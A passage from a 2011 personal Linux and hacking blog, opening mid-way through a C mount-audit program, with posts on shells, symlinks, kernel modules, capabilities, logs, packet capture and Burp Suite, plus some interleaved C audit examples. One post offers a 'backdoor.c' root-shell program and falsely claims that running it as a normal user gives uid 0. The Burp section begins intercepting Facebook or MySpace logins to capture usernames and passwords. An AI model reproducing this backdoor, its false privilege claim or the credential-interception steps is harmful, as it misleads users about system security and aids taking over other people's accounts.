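        int m = audit_mountpoint(kConstructedFstab, check[i], missing, sizeof missing);
        if (m == 0)
            printf("%-6s ok\n", check[i]);
        else
            printf("%-6s missing: %s\n", check[i], missing);
    }
    /* To audit the running system instead of the constructed text, open the
       mount table with setmntent("/proc/mounts", "r") and close it with
       endmntent(); getmntent() and hasmntopt() stay the same. */
    return 0;
}
```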


Tuesday, November 8, 2011

Know your Google meme.

check out these awesome tweaks by Google...
Do a barrel roll - http://bit.ly/uT7a9E
Google Sphere - http://bit.ly/uXfgyO
Epic Google - http://bit.ly/uGANwB
Google Gravity - http://bit.ly/nLGzd1
Tilt - http://bit.ly/vNtlSn
Google Loco - http://bit.ly/urU8vW
Google Gothic - http://bit.ly/v2VhZm
Google Pacman - http://bit.ly/s1nNin
Google Guitar - http://bit.ly/uiJKH1
Google Pirate - http://bit.ly/tNQmEa
Google Rainbow - http://bit.ly/uNc4cy
Google Reverse - http://bit.ly/vL87YT

Saturday, November 5, 2011

Types of Shell in Linux



Shells play an important role in Linux and Unix systems. Everything that happens on your distro is because of either the shell or the kernel. Moreover, a backend shell is initialized as soon as you log in. There are lots of shells in the Unix and Linux world. Let's try to know more about them:

What is a shell?

A shell is the software installed on your system that works as a command-line interpreter, i.e. it takes the commands you type, interprets them and hands them to the operating system (kernel) through system calls to execute. There are many different shells available to choose from in Linux.

C Shell (csh): C shell was created by Bill Joy while he was studying at the University of California, Berkeley. He released it under the BSD license; the syntax of C shell is similar to the C programming language, hence the name C shell.

TC Shell (tcsh): An improved version of C shell that provides some additional features like command line completion and editing. In most Linux systems /bin/csh is linked to /bin/tcsh and its alternatives, so when you try to start the C shell, TC shell gets started.

[image: C shell linked to its alternatives]

Korn Shell (ksh): Korn shell was developed by David Korn at AT&T Bell Laboratories. It contains many features of C shell and Bourne shell.

Bourne Shell (sh): The default shell in many Unix systems, developed by Stephen Bourne of AT&T Bell Laboratories.

GNU Bourne-Again Shell (bash): Bash is the default shell in most Linux distributions. It's a free and open source clone of the Bourne shell. It was developed by Brian Fox for the GNU project. It's the most feature-rich shell available and is compatible with the Bourne shell.

To find out all the shells installed on your system, type "$ cat /etc/shells". Your default shell is defined in the /etc/passwd file.

To switch to a different shell on your system, just type the name of that shell (as in /etc/shells) and hit enter.

Z Shell (zsh): The Z shell (zsh) is a Unix shell that can be used as an interactive login shell and as a powerful command interpreter for shell scripting. Zsh can be thought of as an extended Bourne shell with a large number of improvements, including some features of bash, ksh, and tcsh. It includes features like automated spell correction, editing multiple-line commands within a single buffer and many more.

[image: Finally, my shell....]

Vishal Mishra…..I am Back !

It's been a long time since I blogged something; actually I got busy with my work, but now I am kind of free, so my advance New Year resolution is "one post each day"..

Well, I think when you are busy you should take a few seconds out of it to relax and think of the things you have done and praise yourself for it; it will give you a positive vibe to deal with the further stress. Now you all must be thinking where the heck I was busy!! Well, I am in the final year of my graduation and now things which seemed quite easy before are becoming tougher, and so many things are going around like placement, seminar, major project etc. So I can say that the last year is really stressful for every graduate, and the same is happening with me also... no big deal though.

Well, so what am I up to these days....

1: Making a new operating system in C

2: Giving a seminar on Sixth Sense technology {all credit to Pranav Mistry; I did my best, I guess}

3: Shell application to update Facebook status

4: VGA programming

5: Reading Intel x86 manuals

6: Learning assembly language {all hackers must try this}

7: TCP/IP programming

8: Last but not least, blogging also from now on.....

So soon I'll be updating about these things, so keep looking, and if you have any query I will be glad to answer that...

Wednesday, September 14, 2011

Resume Format

                              
This is to inform all 4th year students of the Institute of Engineering & Technology that they should please submit their Resume latest by 15 Sept 2011.
Resume format is attached here....click here
Date of off-campus: 21 September 2011
Venue: Meerut University

Yours sincerely
Vishal Mishra
Training & Placement Representative
Computer Science & Engg.

Sunday, August 14, 2011

How to create soft link with ln command in linux

To make links between files you need to use ln command. A symbolic link (also known as a soft link or symlink) consists of a special type of file that serves as a reference to another file or directory. Unix/Linux like operating systems often uses symbolic links.
Two types of links

There are two types of links

    symbolic links: refer to a symbolic path indicating the abstract location of another file
    hard links: refer to the specific location of physical data.

How do I create soft link / symbolic link?

To create a symbolic link in Unix or Linux, at the shell prompt, enter the following command:
ln -s {target-filename} {symbolic-filename}

For example, to create a soft link for /home/vishal/Desktop/syllabi.pdf as /home/vishal/study/syllabi1.pdf, enter the following commands (the ls shows the new link and its target):
ln -s /home/vishal/Desktop/syllabi.pdf  /home/vishal/study/syllabi1.pdf
ls -l /home/vishal/study/syllabi1.pdf


Output:

lrwxrwxrwx 1 vishal  vishal    16 2011-08-12 22:53 syllabi1.pdf -> /home/vishal/Desktop/syllabi.pdf

Saturday, August 13, 2011

My first linux kernel module ...Hello World!!


Hi guys. Today we are going to learn something about kernels: we will install a module in our Linux operating system. Before doing that, I request you to please google the difference between a microkernel and a monolithic kernel. My question is: why are we interested in kernels???
I think the very obvious answer to this question is that if you know every basic thing about your system and how it is implemented, then you can screw it very easily..
So now it's time for a little warning: if you love your laptop, then think before trying this. No, there is no harm... but the probability of something going wrong is much higher because you are dealing with the heart {core} of the system.



The module_init() macro defines which function is to be called at module insertion time (if the file is compiled as a module), or at boot time: if the file is not compiled as a module the module_init() macro becomes equivalent to __initcall(), which through linker magic ensures that the function is called on boot.
The function can return a negative error number to cause module loading to fail (unfortunately, this has no effect if the module is compiled into the kernel). For modules, this is called in user context, with interrupts enabled, and the kernel lock held, so it can sleep.

This module_exit() macro defines the function to be called at module removal time (or never, in the case of the file compiled into the kernel). It will only be called if the module usage count has reached zero. This function can also sleep, but cannot fail: everything must be cleaned up by the time it returns.


Code: hello_world.c

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/version.h>

MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("This is my First Test Module...!");
MODULE_AUTHOR("Vishal Mishra");

/* Called when the module is inserted (insmod); returning 0 means success. */
static int __init my_start_init(void)
{
        printk(KERN_INFO "Hello World module loaded...!\n");
        return 0;
}

/* Called when the module is removed (rmmod); it cannot fail. */
static void __exit my_remove_exit(void)
{
        printk(KERN_INFO "Hello World module Un-loaded...!\n");
}

module_init(my_start_init);
module_exit(my_remove_exit);






Makefile:


obj-m := hello_world.o

# recipe lines below must start with a tab character, not spaces
all:
	make -C /lib/modules/$(shell uname -r)/build/ M=$(shell pwd) modules

clean:
	make -C /lib/modules/$(shell uname -r)/build/ M=$(shell pwd) clean



Now save the above code as Makefile in the same folder in which hello_world.c is present.

Now you can run the following commands to get information about your newly installed module:

1: modinfo hello_world.ko
2: lsmod  {this command lists all installed modules in your kernel, so you can check whether hello_world is there or not}

For more on Linux kernel module programming, check out my new post, which explains each function used above in detail, here
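As an added example (not part of this post or of the kernel sources), here is the check behind the lsmod step above: rmmod only reaches module_exit() when the usage count is zero, and that count is the third field of each /proc/modules line, which is the data lsmod prints. The struct, the function names and the sample_modules text are constructed for this example; read the real /proc/modules into a buffer to check a live module.

```c
#include <stdio.h>
#include <string.h>

/* Fields of one /proc/modules line: "name size refcount holders state addr". */
struct modstat {
    char name[64], holders[128], state[16];  /* holders is "-" when none */
    unsigned refcount;                       /* count module_exit() waits on */
};

/* Constructed /proc/modules text: hello_world idle, nf_conntrack pinned. */
static const char *sample_modules =
    "hello_world 16384 0 - Live 0xffffffffc0a00000\n"
    "nf_conntrack 172032 2 nf_nat,xt_conntrack, Live 0xffffffffc0900000\n"
    "xt_conntrack 16384 1 - Live 0xffffffffc0800000\n";

/* Find NAME in /proc/modules-format text; returns 1 and fills *m if loaded. */
int find_module(const char *text, const char *name, struct modstat *m)
{
    for (const char *line = text; *line; ) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        char buf[256];
        if (len < sizeof buf) {
            memcpy(buf, line, len);
            buf[len] = '\0';
            if (sscanf(buf, "%63s %*lu %u %127s %15s", m->name, &m->refcount,
                       m->holders, m->state) == 4 && strcmp(m->name, name) == 0)
                return 1;
        }
        if (!nl) break;
        line = nl + 1;
    }
    return 0;
}

/* 1 if rmmod NAME would reach module_exit(): loaded, Live, usage count zero.
 * Otherwise 0, with the reason written into why (n bytes). */
int can_unload(const char *text, const char *name, char *why, size_t n)
{
    struct modstat m;
    if (!find_module(text, name, &m))
        snprintf(why, n, "%s: not loaded", name);
    else if (strcmp(m.state, "Live") != 0)
        snprintf(why, n, "%s: state %s, not Live", name, m.state);
    else if (m.refcount != 0)
        snprintf(why, n, "%s: usage count %u, held by %s", name, m.refcount, m.holders);
    else {
        snprintf(why, n, "%s: usage count 0, safe to rmmod", name);
        return 1;
    }
    return 0;
}

int main(void)
{
    char why[256];
    can_unload(sample_modules, "nf_conntrack", why, sizeof why);
    puts(why);
    return 0;
}
```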














Reference:
Tutorials - OSDev Wiki
http://linuxpoison.blogspot.com/2008/01/want-to-write-linux-kernel.html
http://linuxkernel51.blogspot.com/2011/03/lodable-kernel-module.html
http://tldp.org/LDP/lkmpg/2.6/html/index.html

Thursday, August 11, 2011

Printing the Execution Environment in C language

Enumerating all the variables in the environment is a little trickier. To do this, you must access a special global variable named environ, which is defined in the GNU C library. This variable, of type char**, is a NULL-terminated array of pointers to character strings. Each string contains one environment variable, in the form VARIABLE=value.


#include <stdio.h>

/* Provided by the C library: NULL-terminated array of "VARIABLE=value" strings. */
extern char **environ;

int main(void)
{
        char **var;
        for (var = environ; *var != NULL; ++var)
                printf("%s\n", *var);
        return 0;
}


Output: (screenshot of the environment variables, one per line)

Now you know each and every environment variable's value; you can use them to hack into the system... try it!
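An added example, not the post's code, that goes one step beyond printing: it walks an environ-style array, looks at each NAME=value entry, and reports the ones worth checking when auditing a system (dynamic loader overrides such as LD_PRELOAD, and PATH entries that are empty or relative). sample_env, the function names and the /tmp/example.so value are constructed; pass the real environ to env_audit to inspect the running process.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample laid out like environ; pass environ to audit the real one. */
static char *sample_env[] = {
    "HOME=/home/vishal",
    "PATH=/usr/local/bin:.:/usr/bin::/bin",  /* "." and "" are unsafe */
    "LD_PRELOAD=/tmp/example.so",            /* placeholder loader override */
    "SHELL=/bin/bash",
    "BROKEN",                                /* malformed: no '=' */
    NULL
};

/* PATH elements that are empty or relative: each resolves commands through a
 * directory that may be writable by someone else. */
int unsafe_path_entries(const char *path)
{
    int bad = 0;
    for (const char *p = path;; p = strchr(p, ':') + 1) {
        const char *sep = strchr(p, ':');
        size_t len = sep ? (size_t)(sep - p) : strlen(p);
        if (len == 0 || p[0] != '/')
            bad++;
        if (!sep)
            return bad;
    }
}

/* Audit env the way the loop above walks it, but reading each NAME=value:
 * prints every finding to out and returns how many there were. */
int env_audit(char **env, FILE *out)
{
    int findings = 0;
    for (char **var = env; *var != NULL; ++var) {
        if (strchr(*var, '=') == NULL) {
            fprintf(out, "malformed entry: %s\n", *var);
            findings++;
        } else if (strncmp(*var, "LD_", 3) == 0) {
            fprintf(out, "dynamic loader override: %s\n", *var);
            findings++;
        } else if (strncmp(*var, "PATH=", 5) == 0) {
            int bad = unsafe_path_entries(*var + 5);
            if (bad)
                fprintf(out, "PATH has %d empty or relative entries\n", bad);
            findings += bad;
        }
    }
    return findings;
}

int main(void)
{
    printf("%d findings in the sample environment\n", env_audit(sample_env, stdout));
    return 0;
}
```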

Wednesday, August 10, 2011

How to give a normal user superuser privilege?..Linux Hack


#include <unistd.h>

/* Backdoor as described in the post: try to become root, then exec a shell. */
int main(void)
{
        char *name[2];
        setuid(0);                 /* return value ignored, as in the original */
        name[0] = "/bin/sh";
        name[1] = NULL;
        execve(name[0], name, NULL);
        return 0;
}


Save this file as backdoor.c and compile it, then use its output file to get superuser privilege..
That's it; now run the output file from a normal user account..
Vishal@Eva$ ./b      (suppose the name of the output file is b)
$
Now check your uid:
$ id -u
0
Output "0" confirms that you now have superuser privilege.
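The defender's side of this, as an added example that is not the post's code: setuid(0) only succeeds when the file already carries root's set-user-ID bit, so the audit below walks one directory and reports every regular file with S_ISUID set, flagging the root-owned ones. The struct and function names are assumptions of this example.

```c
#define _XOPEN_SOURCE 700   /* lstat, mkdtemp, snprintf under a strict -std */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dirent.h>
#include <sys/stat.h>

struct setuid_report {
    int setuid_files;   /* regular files carrying the set-user-ID bit */
    int root_owned;     /* of those, owned by uid 0: the ones setuid(0) needs */
};

/* 1 if path is a regular file with S_ISUID; *root_owned set to st_uid == 0. */
int is_setuid_file(const char *path, int *root_owned)
{
    struct stat st;
    if (lstat(path, &st) != 0 || !S_ISREG(st.st_mode) || !(st.st_mode & S_ISUID))
        return 0;
    if (root_owned)
        *root_owned = (st.st_uid == 0);
    return 1;
}

/* Scan the entries of dir (not recursive), printing findings to out.
 * Returns the number of set-user-ID files, or -1 if dir cannot be opened. */
int scan_setuid(const char *dir, FILE *out, struct setuid_report *r)
{
    DIR *d = opendir(dir);
    char path[4096];
    if (!d)
        return -1;
    memset(r, 0, sizeof *r);
    for (struct dirent *e; (e = readdir(d)) != NULL; ) {
        int root = 0;
        if (strcmp(e->d_name, ".") == 0 || strcmp(e->d_name, "..") == 0)
            continue;
        snprintf(path, sizeof path, "%s/%s", dir, e->d_name);
        if (is_setuid_file(path, &root)) {
            r->setuid_files++;
            r->root_owned += root;
            fprintf(out, "%s setuid file: %s\n", root ? "ROOT-OWNED" : "user-owned", path);
        }
    }
    closedir(d);
    return r->setuid_files;
}

int main(int argc, char **argv)
{
    struct setuid_report r;
    const char *dir = argc > 1 ? argv[1] : "/usr/bin";  /* a usual setuid home */
    int n = scan_setuid(dir, stdout, &r);
    if (n < 0) {
        perror(dir);
        return EXIT_FAILURE;
    }
    printf("%d setuid files in %s, %d root-owned\n", n, dir, r.root_owned);
    return EXIT_SUCCESS;
}
```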

Tuesday, August 9, 2011

How to remove Linux kernel capabilities and make root handicapped??

As you may know, Linux has capabilities. Maybe you don't need all of them; if this is your case, you are in luck, since you can remove them using the lcap tool.
To list all Linux capabilities:
~# lcap
Current capabilities: 0xFFFDFCFF
   0) *CAP_CHOWN                     1) *CAP_DAC_OVERRIDE
   2) *CAP_DAC_READ_SEARCH           3) *CAP_FOWNER
   4) *CAP_FSETID                    5) *CAP_KILL
   6) *CAP_SETGID                    7) *CAP_SETUID
   8) *CAP_SETPCAP                   9) *CAP_LINUX_IMMUTABLE
  10) *CAP_NET_BIND_SERVICE         11) *CAP_NET_BROADCAST
  12) *CAP_NET_ADMIN                13) *CAP_NET_RAW
  14) *CAP_IPC_LOCK                 15) *CAP_IPC_OWNER
  16) *CAP_SYS_MODULE               17)  CAP_SYS_RAWIO
  18) *CAP_SYS_CHROOT               19) *CAP_SYS_PTRACE
  20) *CAP_SYS_PACCT                21) *CAP_SYS_ADMIN
  22) *CAP_SYS_BOOT                 23) *CAP_SYS_NICE
  24) *CAP_SYS_RESOURCE             25) *CAP_SYS_TIME
  26) *CAP_SYS_TTY_CONFIG           27) *CAP_MKNOD
  28) *CAP_LEASE                    29) *CAP_AUDIT_WRITE
  30) *CAP_AUDIT_CONTROL
    * = Capabilities currently allowed

For example, I want to disable CAP_CHOWN, so that no user (including root) has the possibility to change a file's owner. In this case, the file is UNCHOWNABLE.
Usual way:
# touch filename
# chown vishal filename
Now the file is owned by vishal.
My preferred way:
First, we remove the CHOWN capability (as root):
# lcap CAP_CHOWN
# touch filename
# chown vishal filename
chown: changing ownership of `filename': Operation not permitted
As you can see, chown does not work as expected, since we have removed that capability. To restore it, you need to reboot.
You can disable any capability at your own risk ;)
This tool is interesting: with a few changes/updates you end up with increased security. For example, to remove the possibility of loading/unloading a module, drop CAP_SYS_MODULE; it helps a bit against rootkits. For files that you don't want modified in any way, you can use CAP_LINUX_IMMUTABLE on /bin, /usr/bin, /sbin, /usr/sbin to keep the expected binaries (checksums). Try playing with any capability and see if it is interesting for you.
For further info: man lcap


Ubuntu (Linux) log files and usage

It's really important sometimes to check log files, whether you are working on your home system or on a server, etc. So let's see how we can do that in Ubuntu (Linux). Well, this will work for most Linux distributions. The first thing we must know is which log file contains what and where it is located on our system, so that we can access it according to our need...

=> /var/log/messages or /var/log/syslog : General log messages
=> /var/log/boot : System boot log
=> /var/log/debug : Debugging log messages
=> /var/log/auth.log : User login and authentication logs
=> /var/log/daemon.log : Running services such as squid, ntpd and others log message to this file
=> /var/log/dmesg : Linux kernel ring buffer log
=> /var/log/dpkg.log : All binary package log includes package installation and other information
=> /var/log/faillog : User failed login log file
=> /var/log/kern.log : Kernel log file
=> /var/log/lpr.log : Printer log file
=> /var/log/mail.* : All mail server message log files
=> /var/log/mysql.* : MySQL server log file
=> /var/log/user.log : All userlevel logs
=> /var/log/Xorg.0.log : X.org log file
=> /var/log/apache2/* : Apache web server log files directory
=> /var/log/lighttpd/* : Lighttpd web server log files directory
=> /var/log/fsck/* : fsck command log
=> /var/log/apport.log : Application crash report / log file




View log files using the GNOME System Log Viewer

System Log Viewer is a graphical, menu-driven viewer that you can use to view and monitor your system logs. System Log Viewer comes with a few functions that can help you manage your logs, including a calendar, log monitor and log statistics display. System Log Viewer is useful if you are new to system administration because it provides an easier, more user-friendly display of your logs than a text display of the log file. It is also useful for more experienced administrators, as it contains a calendar to help you locate trends and track problems, as well as a monitor to enable you to continuously monitor crucial logs.
You can start System Log Viewer in the following ways:
Click on System menu > Choose Administration > Log file viewer:

(The GNOME System Log Viewer)
Note you can start the GNOME System Log Viewer from a shell prompt by entering the following command:
$ gnome-system-log &

Monday, August 8, 2011

What does Ubuntu mean???

Ubuntu is a South African ethical ideology focusing on people's allegiances and relations with each other. The word comes from the Zulu and Xhosa languages. Ubuntu is seen as a traditional African concept, is regarded as one of the founding principles of the new republic of South Africa and is connected to the idea of an African Renaissance.

A rough translation of the principle of Ubuntu is "humanity towards others". Another translation could be: "The belief in a universal bond of sharing that connects all humanity".


                                                             


"A person with ubuntu is open and available to others, affirming of others, does not feel threatened that others are able and good, for he or she has a proper self-assurance that comes from knowing that he or she belongs in a greater whole and is diminished when others are humiliated or diminished, when others are tortured or oppressed."
 -- Archbishop Desmond Tutu

As a platform based on Free software, the Ubuntu operating system brings the spirit of ubuntu to the software world.

The Ubuntu project is entirely committed to the principles of free software development; people are encouraged to use free software, improve it,and pass it on.

"Free software" doesn't mean that you shouldn't have to pay for it (although Ubuntu is committed to being free of charge as well). It means that you should be able to use the software in any way you wish: the code that makes up free software is available for anyone to download, change, fix, and use in any way. Alongside ideological benefits, this freedom also has technical advantages: when programs are developed, the hard work of others can be used and built upon. With non-free software, this cannot happen and when programs are developed, they have to start from scratch. For this reason the development of free software is fast, efficient and exciting!

What is Akamai Technologies?

While tracing my network I came across this akamaitechnologies; I was constantly getting packets from this website's server, so finally I googled it and came to know about this company.

 

The company was founded in 1998 by then-MIT graduate student Daniel M. Lewin, and MIT Applied Mathematics professor Tom Leighton.

Akamai transparently mirrors content—sometimes all site content including HTML, CSS, and software downloads, and sometimes just media objects such as audio, graphics, animation, and video—from customer servers. Though the domain name (but not subdomain) is the same, the IP address points to an Akamai server rather than the customer's server. The Akamai server is automatically picked depending on the type of content and the user's network location.

The benefit is that users can receive content from whichever Akamai server is close to them or has a good connection, leading to faster download times and less vulnerability to network congestion or outages.

In addition to content caching, Akamai provides services which accelerate dynamic and personalized content, J2EE-compliant applications, and streaming media to the extent that such services frame a localized perspective.

(Diagram: the Akamai process)

In the diagram shown, we see an "Akamaized" website; this simply means that certain content within the website (usually media objects such as audio, graphics, animation, video) will not point to servers owned by the original website, in this case ACME, but to servers owned by Akamai. It is important to note that even though the domain name is the same, namely www.acme.com and image.acme.com, the ip address (server) that image.acme.com points to is actually owned by Akamai and not ACME.

Step 1. The client's browser requests the default web page at the ACME site. The site returns the web page index.html.

Step 2. If the html code is examined you can see that there is a link to an image hosted on the Akamai owned server image.acme.com.

Step 3. As your web browser parses the html code it pulls the image object bigpicture.jpg from image.acme.com.

Using tcpdump and wireshark to capture packets on a Linux system


The following command will capture all packets on the eth0 network interface and log them to a file called packets.tcpdump.
tcpdump -i eth0 -s 0 -U -w packets.tcpdump
tcpdump will continue to run in the foreground while you generate the network activity.  When you're done, press CTRL+C to stop tcpdump.  Note that running tcpdump in this manner could have an adverse effect on network performance, so you should not leave this running in a production environment.
Capturing all packets also has a potential to use a lot of disk space if your network is busy.  If you're having trouble finding the traffic you want because the dump is too large, consider passing additional arguments to tcpdump to filter the types of packets that are captured, e.g., only packets from a certain IP address or only packets on a certain port.
The following command will only capture TCP packets destined for or originating from port 80.
tcpdump -i eth0 -s 0 -U -w port-80-packets.tcpdump tcp port 80
Of course, the downside to filtering the dump at capture-time is that you may miss something that helps you debug the problem you're encountering.  If you can afford the disk space and your network is not that busy, it may be better to capture all packets and just use a view filter in Wireshark to help you find what you're looking for.
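An added example, not from the post or from tcpdump itself, showing what the file written with -w contains: a reader for the pcap format that counts packets and bytes on the wire and reports how many records were cut short, which is the truncation that -s 0 above is meant to avoid. sample_pcap, the struct and the function names are constructed for this example, and only little-endian files are handled.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

struct pcap_summary {
    uint32_t packets, bytes_on_wire, truncated, snaplen, linktype;
};

/* pcap fields are in the capturing host's byte order; magic 0xa1b2c3d4 read
 * little-endian means this reader only handles files from x86 hosts. */
static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Walk buf (n bytes): 24-byte global header, then records of a 16-byte header
 * (ts_sec, ts_usec, caplen, len) plus caplen bytes. 0 on success, -1 on a
 * bad magic or a record running past the end of the file. */
int pcap_summarize(const uint8_t *buf, size_t n, struct pcap_summary *s)
{
    size_t off = 24;
    if (n < 24 || le32(buf) != 0xa1b2c3d4)
        return -1;
    memset(s, 0, sizeof *s);
    s->snaplen = le32(buf + 16);
    s->linktype = le32(buf + 20);
    while (off + 16 <= n) {
        uint32_t caplen = le32(buf + off + 8);   /* bytes saved in the file */
        uint32_t len = le32(buf + off + 12);     /* original length on the wire */
        if (caplen > n - off - 16)
            return -1;
        s->packets++;
        s->bytes_on_wire += len;
        if (caplen < len)
            s->truncated++;                      /* snaplen cut this packet */
        off += 16 + caplen;
    }
    return off == n ? 0 : -1;
}

/* Constructed capture: header (version 2.4, snaplen 65535, linktype 1 =
 * Ethernet), one complete 4-byte packet, one packet cut from 100 to 4 bytes. */
static const uint8_t sample_pcap[] = {
    0xd4,0xc3,0xb2,0xa1, 0x02,0x00, 0x04,0x00, 0,0,0,0, 0,0,0,0,
    0xff,0xff,0x00,0x00, 0x01,0x00,0x00,0x00,
    0,0,0,0, 0,0,0,0, 0x04,0,0,0, 0x04,0,0,0, 0xaa,0xbb,0xcc,0xdd,
    0,0,0,0, 0,0,0,0, 0x04,0,0,0, 0x64,0,0,0, 0x11,0x22,0x33,0x44,
};

int main(void)
{
    struct pcap_summary s;
    if (pcap_summarize(sample_pcap, sizeof sample_pcap, &s) != 0)
        return 1;
    printf("%u packets, %u bytes on wire, %u truncated (snaplen %u, linktype %u)\n",
           s.packets, s.bytes_on_wire, s.truncated, s.snaplen, s.linktype);
    return 0;
}
```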

To install Wireshark in Ubuntu use the following command:

sudo apt-get install wireshark

To open Wireshark press Alt+F2 and enter the following in the run box:

gksudo wireshark

(Screenshot: the Wireshark main window)

Wireshark is the best utility to capture packets I have ever come across; I recommend it for every Linux noob.

How to use Burp Suite?

What is the Burp Suite?
Burp Suite is an integrated platform for attacking web applications. It contains all of the Burp tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All tools share the same robust framework for handling HTTP requests, persistence, authentication, upstream proxies, logging, alerting and extensibility.
Burp Suite allows you to combine manual and automated techniques to enumerate, analyse, scan, attack and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.
Source: http://www.portswigger.net/suite/
The Burp Suite is made up of tools (descriptions taken from the Port Swigger website):
Proxy: Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web applications. It operates as a man-in-the-middle between the end browser and the target web server, and allows the user to intercept, inspect and modify the raw traffic passing in both directions.
Spider: Burp Spider is a tool for mapping web applications. It uses various intelligent techniques to generate a comprehensive inventory of an application’s content and functionality.
Scanner: Burp Scanner is a tool for performing automated discovery of security vulnerabilities in web applications. It is designed to be used by penetration testers, and to fit in closely with your existing techniques and methodologies for performing manual and semi-automated penetration tests of web applications.
Intruder: Burp Intruder is a tool for automating customised attacks against web applications.
Repeater: Burp Repeater is a tool for manually modifying and reissuing individual HTTP requests, and analysing their responses. It is best used in conjunction with the other Burp Suite tools. For example, you can send a request to Repeater from the target site map, from the Burp Proxy browsing history, or from the results of a Burp Intruder attack, and manually adjust the request to fine-tune an attack or probe for vulnerabilities.
Sequencer: Burp Sequencer is a tool for analysing the degree of randomness in an application’s session tokens or other items on whose unpredictability the application depends for its security.
Decoder: Burp Decoder is a simple tool for transforming encoded data into its canonical form, or for transforming raw data into various encoded and hashed forms. It is capable of intelligently recognising several encoding formats using heuristic techniques.
Enabling the Burp Suite Proxy
To begin using the Burp Suite to test our example web application we need to configure our web browser to use the Burp Suite as a proxy. The Burp Suite proxy will use port 8080 by default but you can change this if you want to.
You can see in the image below that I have configured Firefox to use the Burp Suite proxy for all traffic.
(Screenshot: Firefox proxy settings)
When you open the Burp Suite proxy tool you can check that the proxy is running by clicking on the options tab.
(Screenshot: Burp proxy options tab)

You can see that the proxy is using the default port:
(Screenshot: Burp proxy listening on port 8080)

The proxy is now running and ready to use. You can see that the proxy options tab has quite a few items that we can configure to meet our testing needs.
Now the main phase: we log in to a Facebook, Orkut, MySpace or any other website's account and try to get the username and password using Burp.. let's see how I do it... let the Hacking begin::{it's only for study purposes, don't misuse it}

To do this we must ensure that the Burp Suite proxy is configured to intercept our requests:
(Screenshot: Burp proxy with intercept enabled)

With intercept enabled we will submit the logon form and send it to the Intruder, as you can see below:
(Screenshot: the intercepted logon request)
(Screenshot: sending the request to Intruder)
The Burp Suite will send our request to the Intruder tool so we can begin our testing. You can see the request in the Intruder tool below:
(Screenshot: the request in Intruder)
The tool has automatically created payload positions for us. The payload positions are defined using the § character, the intruder will replace the value between two § characters with one of our test inputs.
The positions tab which is shown in the image above has four different attack types for you to choose from (definitions taken from http://www.portswigger.net/intruder/help.html) :